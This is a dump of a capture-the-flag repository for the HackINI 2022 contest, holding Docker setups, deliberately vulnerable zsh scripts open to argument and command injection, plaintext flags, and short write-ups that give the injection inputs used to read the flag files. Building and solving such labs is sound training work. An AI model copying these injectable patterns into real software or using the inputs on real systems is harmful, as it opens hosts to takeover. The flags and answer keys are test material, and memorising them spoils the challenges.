-------------------------------------------------------------------------------- /linux/loca-loca-1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1201:8765' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 100M 16 | -------------------------------------------------------------------------------- /linux/loca-loca-1/requirements.txt: -------------------------------------------------------------------------------- 1 | websockets 2 | werkzeug 3 | jinja2 4 | -------------------------------------------------------------------------------- /linux/loca-loca-1/solution/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 1 2 | 3 | ## Write-up (TODO) 4 | 5 | ## Flag 6 | 7 | `shellmates{Wh3n_wIlL_YOu_l34rn_To_EXeCuT3_biN4R1e$_WitH_TH3iR_4BSOluT3_P4Th}` 8 | 9 | -------------------------------------------------------------------------------- /linux/loca-loca-2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \ 5 | locales locales-all \ 6 | && rm -rf /var/lib/apt/lists/* 7 | 8 | COPY requirements.txt /tmp/ 9 | 10 | RUN python -m pip install -r /tmp/requirements.txt && \ 11 | rm /tmp/requirements.txt 12 | 13 | WORKDIR /challenge 14 | 15 | COPY challenge/server.py . 16 | COPY challenge/entrypoint.sh . 17 | COPY challenge/flag.runme . 18 | 19 | RUN chmod +x server.py entrypoint.sh && \ 20 | chmod 111 flag.runme 21 | 22 | EXPOSE 8765 23 | 24 | USER nobody 25 | 26 | ENTRYPOINT ["./entrypoint.sh"] 27 | -------------------------------------------------------------------------------- /linux/loca-loca-2/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 2 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Okay okay, I understand now, I'm not gonna use commands with relative path again. 8 | > Anyway, that should be fixed now, it's totally secure now, right? 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). 13 | 14 | -------------------------------------------------------------------------------- /linux/loca-loca-2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Loca Loca 2" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: linux 6 | difficulty: hard 7 | 8 | description: | 9 | > Okay okay, I understand now, I'm not gonna use commands with relative path again. 10 | > Anyway, that should be fixed now, it's totally secure now, right? 11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: python3 client.py docker.shellmates.club $INSTANCE_PORT 15 | 16 | image: gcr.io/glowing-reserve-336013/loca-loca-2:latest 17 | docker_image: gcr.io/glowing-reserve-336013/loca-loca-2:latest 18 | 19 | value: 500 20 | type: docker 21 | 22 | tags: 23 | - hard 24 | 25 | files: 26 | - ./challenge/client.py 27 | - ./challenge/server.py 28 | 29 | flags: 30 | - shellmates{$OY_L0ca_cOn_M1_tiGRE_L0C4_L0Ca_l0c4} 31 | 32 | requirements: 33 | - "Loca Loca 1" 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /linux/loca-loca-2/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | while :; do 4 | ./server.py 5 | echo "Restarting server..." 6 | done 7 | -------------------------------------------------------------------------------- /linux/loca-loca-2/challenge/flag.runme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/loca-loca-2/challenge/flag.runme -------------------------------------------------------------------------------- /linux/loca-loca-2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1202:8765' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 100M 16 | -------------------------------------------------------------------------------- /linux/loca-loca-2/requirements.txt: -------------------------------------------------------------------------------- 1 | websockets 2 | werkzeug 3 | jinja2 4 | -------------------------------------------------------------------------------- /linux/loca-loca-2/solution/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 2 2 | 3 | ## Write-up (TODO) 4 | 5 | ## Flag 6 | 7 | `shellmates{$OY_L0ca_cOn_M1_tiGRE_L0C4_L0Ca_l0c4}` 8 | 9 | -------------------------------------------------------------------------------- /linux/nutshell1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | 4 | RUN apt-get update && \ 5 | apt-get install -y socat zsh 6 | 7 | RUN useradd -M -s /bin/zsh nutshell1 8 | 9 | RUN mkdir -p /challenge 10 | 11 | COPY challenge/flag /challenge/ 12 | COPY challenge/nutshell1 /challenge/ 13 | 14 | RUN chown root:root /challenge/flag \ 15 | && chmod 444 /challenge/flag \ 16 | && chown root:root /challenge/nutshell1 \ 17 | && chmod 555 /challenge/nutshell1 18 | 19 | EXPOSE 1337 20 | 21 | COPY challenge/entrypoint.sh /entrypoint.sh 22 | RUN chmod +x /entrypoint.sh 23 | 24 | WORKDIR /challenge 25 | USER nutshell1 26 | 27 | ENTRYPOINT /entrypoint.sh 28 | -------------------------------------------------------------------------------- /linux/nutshell1/README.md: -------------------------------------------------------------------------------- 1 | # Nutshell 1 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | I created my own script, make sure to **read** it well. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /linux/nutshell1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Nutshell 1" 2 | author: "badsUwU" 3 | author_link: "https://github.com/abdelmaoo" 4 | 5 | category: linux 6 | difficulty: medium 7 | 8 | description: | 9 | > I created my own script, make sure to **read** it well. 10 | 11 | **Author** : badsUwU 12 | 13 | flags: 14 | - shellmates{nUt$H3ll_1_PWnED} 15 | 16 | connection_info: ncat -v --ssl nutshell1.challs.shellmates.club 443 17 | 18 | image: gcr.io/glowing-reserve-336013/nutshell1 19 | 20 | tags: 21 | - medium 22 | - zsh 23 | 24 | files: 25 | - challenge/nutshell1 26 | 27 | value: 500 28 | type: dynamic 29 | extra: 30 | initial: 500 31 | decay: 15 32 | minimum: 50 33 | state: visible 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /linux/nutshell1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | exec socat -v tcp-listen:1337,reuseaddr,fork,keepalive, EXEC:"./nutshell1",stderr 4 | -------------------------------------------------------------------------------- /linux/nutshell1/challenge/flag: -------------------------------------------------------------------------------- 1 | shellmates{nUt$H3ll_1_PWnED} -------------------------------------------------------------------------------- /linux/nutshell1/challenge/nutshell1: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | nutshell() { 4 | 5 | echo -n '>> ' 6 | read v1 7 | echo -n '> ' 8 | v2=$(read $v1) 9 | if [[ ! -z $v1 && ! -z $v2 ]]; then 10 | echo noice 11 | $(echo $v2) 12 | exit 13 | fi 14 | echo 'try again ... ' 15 | 16 | } 17 | 18 | echo 'welcome to the ______' 19 | 20 | nutshell 2>/dev/null 21 | 22 | -------------------------------------------------------------------------------- /linux/nutshell1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /linux/nutshell1/solution/README.md: -------------------------------------------------------------------------------- 1 | # nutshell 1 2 | 3 | ## Write-up 4 | 5 | In the line `11`, the content of `v2` gets executed, but in line `8`, `v2` recieve the output of the `read` command, and we know that `read` returns nothing. 6 | By reading the `man` page of `read` in `zsh`, we see that the options `-e` and `-E` allow to echo and affect the variable in the same time. 7 | so all you need to do is to give `-E` or `-e` to `v1`, and then `v2=$(read $v1)` will be interpreted as `v2=$(read -e)`, giving `cat flag` will print the flag 8 | 9 | # Flag 10 | 11 | `shellmates{nUt$H3ll_1_PWnED}` 12 | -------------------------------------------------------------------------------- /linux/nutshell2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | 4 | RUN apt-get update && \ 5 | apt-get install -y socat zsh 6 | 7 | RUN useradd -M -s /bin/zsh nutshell2 8 | 9 | RUN mkdir -p /challenge 10 | 11 | COPY challenge/flag /challenge/ 12 | COPY challenge/nutshell2 /challenge/ 13 | 14 | RUN chown root:root /challenge/flag \ 15 | && chmod 444 /challenge/flag \ 16 | && chown root:root /challenge/nutshell2 \ 17 | && chmod 555 /challenge/nutshell2 \ 18 | && chmod 557 /challenge 19 | 20 | EXPOSE 1337 21 | 22 | COPY challenge/entrypoint.sh /entrypoint.sh 23 | RUN chmod +x /entrypoint.sh 24 | 25 | WORKDIR /challenge 26 | USER nutshell2 27 | 28 | ENTRYPOINT /entrypoint.sh 29 | -------------------------------------------------------------------------------- /linux/nutshell2/README.md: -------------------------------------------------------------------------------- 1 | # Nutshell 2 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | Let's try again, can you escape it now?` 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /linux/nutshell2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Nutshell 2" 2 | author: "badsUwU" 3 | author_link: "https://github.com/abdelmaoo" 4 | 5 | category: linux 6 | difficulty: medium 7 | 8 | description: | 9 | > Counting backwards ? 10 | 11 | **Author** : badsUwU 12 | 13 | connection_info: ncat -v docker.shellmates.club $INSTANCE_PORT 14 | 15 | image: gcr.io/glowing-reserve-336013/nutshell2:latest 16 | docker_image: gcr.io/glowing-reserve-336013/nutshell2:latest 17 | 18 | flags: 19 | - shellmates{nUt$H3ll_2_PWnED_vkfdnvjfk} 20 | 21 | tags: 22 | - medium 23 | 24 | files: 25 | - ./challenge/nutshell2 26 | 27 | value: 500 28 | type: docker 29 | 30 | state: visible 31 | version: "0.1" 32 | -------------------------------------------------------------------------------- /linux/nutshell2/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | exec socat -v tcp-listen:1337,reuseaddr,fork,keepalive, EXEC:"./nutshell2",stderr 4 | -------------------------------------------------------------------------------- /linux/nutshell2/challenge/flag: -------------------------------------------------------------------------------- 1 | shellmates{nUt$H3ll_2_PWnED_vkfdnvjfk} -------------------------------------------------------------------------------- /linux/nutshell2/challenge/nutshell2: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | 4 | nutshell() { 5 | 6 | echo -n "> " 7 | read v1 8 | touch $(echo $v1) 2>/dev/null 9 | if [[ -f nutshell_file ]];then 10 | read BIRTH MODIFY <<< $( stat nutshell_file --format "%w %y" ) 11 | echo "BIRTH = " $BIRTH 12 | echo "MODIFY = " $MODIFY 13 | read BIRTH MODIFY <<< $( stat nutshell_file --format "%W %Y" ) 14 | if [[ BIRTH -gt MODIFY ]];then 15 | cat flag 16 | fi 17 | fi 18 | rm $(echo $v1) 2>/dev/null 19 | exit 20 | } 21 | 22 | echo 'welcome to Nutshell2.0' 23 | 24 | nutshell 25 | 26 | -------------------------------------------------------------------------------- /linux/nutshell2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /linux/nutshell2/solution/README.md: -------------------------------------------------------------------------------- 1 | # Nutshell2 2 | 3 | ## Write-up 4 | 5 | In this challenge, the script reads in `v1`, then create a file named with the value inputed, then it checks if the birth date is bigher than the last modify date, wich seems illogic. 6 | By reading the man page of `touch` command, we find the option `-t` wich allows us to specify the last modify date. 7 | In docker the `stat` command can't get the birth date, so it gives 0 instead, all you need to do is to give a date before the epoch, you can give the following input: `-t 000001010000 nutshell_file` 8 | 9 | ## Flag 10 | 11 | `shellmates{nUt$H3ll_2_PWnED_vkfdnvjfk}` 12 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM archlinux:latest 2 | 3 | 4 | RUN pacman -Syy && \ 5 | yes | pacman -Su socat zsh sl 6 | 7 | 8 | RUN useradd -m -d /home/supreme -s /bin/zsh supreme 9 | COPY challenge/flag /home/supreme/flag 10 | COPY challenge/nutshell_supreme /home/supreme/supreme 11 | 12 | RUN find /home/supreme/flag -exec chown root:root {} \; && \ 13 | find /home/supreme/flag -type f -exec chmod 774 {} \; && \ 14 | find /home/supreme/flag -type d -exec chmod 775 {} \; 15 | 16 | 17 | EXPOSE 1337 18 | 19 | COPY challenge/entrypoint.sh /entrypoint.sh 20 | RUN chmod +x /entrypoint.sh 21 | 22 | WORKDIR /home/supreme 23 | USER supreme 24 | ENTRYPOINT /entrypoint.sh 25 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/README.md: -------------------------------------------------------------------------------- 1 | # Nutshell 1 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | I created my own shell, cat you escape it? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "nutshell supreme" 2 | author: "badsUwU" 3 | author_link: "https://github.com/abdelmaoo" 4 | 5 | category: linux 6 | difficulty: hard 7 | 8 | description: | 9 | > Here is the final version of nutshell, don't even try... 10 | > I use arch btw. 11 | 12 | **Author** : badsUwU 13 | 14 | flags: 15 | - shellmates{nUt$H3ll_supreme_good_job_12345} 16 | 17 | connection_info: ncat -v --ssl nutshell-supreme.challs.shellmates.club 443 18 | 19 | image: gcr.io/glowing-reserve-336013/nutshell-supreme 20 | 21 | topics: 22 | - zsh 23 | 24 | tags: 25 | - jail 26 | - hard 27 | 28 | files: 29 | - challenge/nutshell_supreme 30 | 31 | value: 500 32 | type: dynamic 33 | extra: 34 | initial: 500 35 | decay: 15 36 | minimum: 50 37 | 38 | state: visible 39 | version: "0.1" 40 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | exec socat -v tcp-listen:1337,reuseaddr,fork,keepalive, EXEC:"/home/supreme/supreme",stderr 4 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge/flag: -------------------------------------------------------------------------------- 1 | shellmates{nUt$H3ll_supreme_good_job_12345} -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge/nutshell_supreme: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | RE="^[a-z0-9A-Z\\]+$" 4 | nutshell() { 5 | echo -n '>' 6 | read v1 7 | 8 | v2=$(read $v1) 9 | 10 | 11 | if [[ ! $v2 =~ $RE || -z $v2 ]]; then 12 | echo wrong input 13 | echo "Doesn't match the whitelist" 14 | exit 1 15 | fi 16 | 17 | export TERM='xterm' 18 | echo 'now the train will give you the flag, wait for it' 19 | sleep 1 20 | sl $(echo $v2) -100 -ade && cat flag 21 | } 22 | 23 | nutshell 24 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /linux/nutshell_supreme/solution/README.md: -------------------------------------------------------------------------------- 1 | # nutshell supreme 2 | 3 | ## Write-up 4 | 5 | The `sl` command on arch is not the original one made by [Toyoda Masashi](https://github.com/mtoyoda/sl) but a branch made by [eyJhb](https://github.com/eyJhb/sl), the difference between them is few options and the exit code, on arch the exit code is `1`, so even when the train passes, the `cat flag` isn't executed. The solution is to inject `-v` to get the version, but the `-` isn't in the whitelist, so you need to give it as hex, to write in `v2` we procede the same way as in [nutshell 1](../../nutshell1), and in `v2` we give `\\2dv` 6 | 7 | ## Flag 8 | 9 | `shellmates{nUt$H3ll_supreme_good_job_12345}` 10 | -------------------------------------------------------------------------------- /linux/remote/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server systemd rsyslog 5 | 6 | RUN useradd -s /bin/bash ctf \ 7 | && echo 'ctf:ctf' | chpasswd 8 | 9 | 10 | COPY challenge/flag.txt / 11 | 12 | RUN chmod 444 /flag.txt 13 | RUN rm /usr/bin/scp 14 | 15 | COPY challenge/sshd_config /etc/ssh/sshd_config 16 | COPY challenge/.bashrc /etc/bash.bashrc 17 | 18 | ENTRYPOINT service rsyslog start \ 19 | && service ssh start \ 20 | && tail -f --retry /var/log/auth.log 21 | -------------------------------------------------------------------------------- /linux/remote/README.md: -------------------------------------------------------------------------------- 1 | # remote 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > At least give me a second to express my commands. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /linux/remote/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "remote" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: linux 6 | difficulty: easy 7 | 8 | description: | 9 | > At least give me a second to express my commands. 10 | 11 | **Password** : ctf 12 | 13 | **Author** : Ouxs 14 | 15 | connection_info: ssh ctf@remote -o ProxyCommand="openssl s_client -quiet -connect remote.challs.shellmates.club:443 -servername remote.challs.shellmates.club" 16 | 17 | image: gcr.io/glowing-reserve-336013/remote 18 | 19 | flags: 20 | - shellmates{HOW_DID_U_M4d3_i7_HERE!} 21 | 22 | tags: 23 | - easy 24 | 25 | value: 500 26 | type: dynamic 27 | extra: 28 | initial: 500 29 | decay: 15 30 | minimum: 50 31 | 32 | state: visible 33 | version: "0.1" -------------------------------------------------------------------------------- /linux/remote/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{HOW_DID_U_M4d3_i7_HERE!} 2 | -------------------------------------------------------------------------------- /linux/remote/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:22 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /linux/welcome/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server systemd rsyslog 5 | 6 | RUN useradd -M -s /bin/bash ctf \ 7 | && echo 'ctf:ctf' | chpasswd 8 | 9 | COPY challenge/sudoers /etc/sudoers 10 | COPY challenge/sshd_config /etc/ssh/sshd_config 11 | COPY challenge/01-custom /etc/update-motd.d/01-custom 12 | 13 | RUN chmod +x /etc/update-motd.d/01-custom && chmod 770 /tmp /var/tmp 14 | 15 | ENTRYPOINT service rsyslog start \ 16 | && service ssh start \ 17 | && tail -f --retry -------------------------------------------------------------------------------- /linux/welcome/README.md: -------------------------------------------------------------------------------- 1 | # Welcome 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > This welcome message seems to be interesting... 8 | 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /linux/welcome/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "welcome" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: linux 6 | difficulty: easy 7 | 8 | description: | 9 | > This welcome message seems to be interesting... 10 | 11 | **flag** : shellmates{what you have found} 12 | **Password** : ctf 13 | 14 | **Author** : Ouxs 15 | 16 | connection_info: ssh ctf@welcome -o ProxyCommand="openssl s_client -quiet -connect welcome.challs.shellmates.club:443 -servername welcome.challs.shellmates.club" 17 | 18 | image: gcr.io/glowing-reserve-336013/welcome 19 | 20 | flags: 21 | - shellmates{f379bbf265604f3514cda4aadbc05137} 22 | 23 | tags: 24 | - easy 25 | 26 | value: 500 27 | type: dynamic 28 | extra: 29 | initial: 500 30 | decay: 15 31 | minimum: 50 32 | 33 | state: visible 34 | version: "0.1" -------------------------------------------------------------------------------- /linux/welcome/challenge/01-custom: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "=========== Hack.INI 22 ==============" 4 | echo "uptime is $( uptime )" 5 | # f379bbf265604f3514cda4aadbc05137 6 | echo "date is $( date )" 7 | echo "======================================" 8 | -------------------------------------------------------------------------------- /linux/welcome/challenge/sudoers: -------------------------------------------------------------------------------- 1 | # 2 | # This file MUST be edited with the 'visudo' command as root. 3 | # 4 | # Please consider adding local content in /etc/sudoers.d/ instead of 5 | # directly modifying this file. 6 | # 7 | # See the man page for details on how to write a sudoers file. 8 | # 9 | Defaults env_reset 10 | Defaults mail_badpass 11 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" 12 | 13 | # Host alias specification 14 | 15 | # User alias specification 16 | 17 | # Cmnd alias specification 18 | 19 | # User privilege specification 20 | root ALL=(ALL:ALL) ALL 21 | 22 | 23 | # See sudoers(5) for more information on "#include" directives: 24 | 25 | #includedir /etc/sudoers.d 26 | ctf ALL=(ctf-cracked:ctf-cracked) /usr/bin/diff 27 | -------------------------------------------------------------------------------- /linux/welcome/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | -------------------------------------------------------------------------------- /linux/welcome/solution/README.md: -------------------------------------------------------------------------------- 1 | # welcome 2 | 3 | ## Write-up 4 | 5 | After accessing the system, we get this welcome message : 6 | ![welcome message](./images/cap1.png) 7 | We notice that the welcome message is customized and based on the title of this challenge *welcome*, if we search, we can find that it's possible to make scripts that get executed once a user logs in. These scripts are located in **/etc/update-motd.d/**. If we check this folder, we will find a file that looks interesting `custom` . If we open it, we will indeed find the welcome message plus an interesting comment that represents the flag. 8 | ![welcome file content](./images/cap2.png) 9 | then wrap shellmates with the `f379bbf265604f3514cda4aadbc05137`. 10 | 11 | ## Payload 12 | ```bash 13 | cat /etc/update-motd.d/01-custom 14 | ``` 15 | 16 | ## Flag 17 | 18 | `shellmates{f379bbf265604f3514cda4aadbc05137}` 19 | 20 | -------------------------------------------------------------------------------- /linux/welcome/solution/images/cap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/welcome/solution/images/cap1.png -------------------------------------------------------------------------------- /linux/welcome/solution/images/cap2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/welcome/solution/images/cap2.png -------------------------------------------------------------------------------- /misc/Alien/Alien.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Alien/Alien.png -------------------------------------------------------------------------------- /misc/Alien/README.md: -------------------------------------------------------------------------------- 1 | # Alien 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | 7 | "Located in a strange lunar landscape of great geological interest, this site has one of the most important groupings of prehistoric cave art in the world. More than 15,000 drawings and engravings record the climatic changes, the animal migrations and the evolution of human life on the edge of the Sahara from 6000 BC to the first centuries of the present era. The geological formations are of outstanding scenic interest, with eroded sandstones forming ‘forests of rock’. 8 | https://whc.unesco.org/en/list/179/"-source: read it 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /misc/Alien/solution/README.md: -------------------------------------------------------------------------------- 1 | # Alien 2 | 3 | ## Write-up 4 | 5 | https://www.reddit.com/r/algeria/comments/hp592u/comment/ia2wtik/?utm_source=share&utm_medium=web2x&context=3 6 | 7 | ## Flag 8 | 9 | `shellmates{4lg3r1a_1$_B34t1fuL}` 10 | -------------------------------------------------------------------------------- /misc/Enigma/README.md: -------------------------------------------------------------------------------- 1 | # Enigma 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | 7 | But before that , we should test you. 8 | Pass the intermediate gates to arrive to your destiney. 9 | link: https://t.me/shellmates_cicada_bot 10 | 11 | ## Solution 12 | 13 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /misc/Enigma/solution/README.md: -------------------------------------------------------------------------------- 1 | # Enigma 2 | 3 | ## Write-up 4 | ## Level 1: 5 | ![IMG](lock.png) 6 | 7 | - Lock code: ``13379E`` 8 | 9 | ## Level 2: 10 | ![IMG](blue.png) 11 | 12 | - There is Braille code on the door by decoding it we'll get the magical phrase: ``opensesame`` 13 | 14 | ## Level 3: 15 | ![IMG](morse.png) 16 | 17 | - this audio contains morse code, you can easily view it using ``audacity``. 18 | there is so many online tools that do the job, 19 | passphrase: ``TAUGH_TIME_NEVER_LAST``. (i knw it should be Tough not Taugh XD) 20 | 21 | ## Level 4: 22 | ![IMG](etcetra.png) 23 | 24 | - by changing the levels using any photo editor: 25 | 26 | ![IMG](gimp.png) 27 | 28 | passphrase: ``S9LMB07`` 29 | 30 | 31 | ## Level 5: 32 | ![IMG](vig.png) 33 | 34 | - Vigenere cipher : ``open the drawer and listen to the cassette!`` 35 | 36 | ## Final level: 37 | 38 | - After reversing the audio at the first time you may hear ``30 cows in a field, 28 chickens how many didn't``, in fact it's ``30 cows in a field, 20 ate chicken how many didn't`` and obviously the answer is: ``10``. 39 | 40 | after solving all this challs the bot will bring you the flag. 41 | 42 | ![IMG](flag.png) 43 | ## Flag 44 | 45 | `shellmates{H4CK1N1_3N1GM4_W1NN3R_154826}` 46 | -------------------------------------------------------------------------------- /misc/Enigma/solution/blue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/blue.png -------------------------------------------------------------------------------- /misc/Enigma/solution/etcetra.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/etcetra.png -------------------------------------------------------------------------------- /misc/Enigma/solution/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/flag.png -------------------------------------------------------------------------------- /misc/Enigma/solution/gimp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/gimp.png -------------------------------------------------------------------------------- /misc/Enigma/solution/lock.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/lock.png -------------------------------------------------------------------------------- /misc/Enigma/solution/morse.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/morse.png -------------------------------------------------------------------------------- /misc/Enigma/solution/vig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/vig.png -------------------------------------------------------------------------------- /misc/README.md: -------------------------------------------------------------------------------- 1 | # Misc 2 | 3 | This directory contains challenges related to the `Misc` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /misc/hello_word/README.md: -------------------------------------------------------------------------------- 1 | # Hello word 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | Whats the structure of an MS word ?? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /misc/hello_word/presentation.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/hello_word/presentation.docx -------------------------------------------------------------------------------- /misc/hello_word/solution/README.md: -------------------------------------------------------------------------------- 1 | # Hello word 2 | 3 | ## 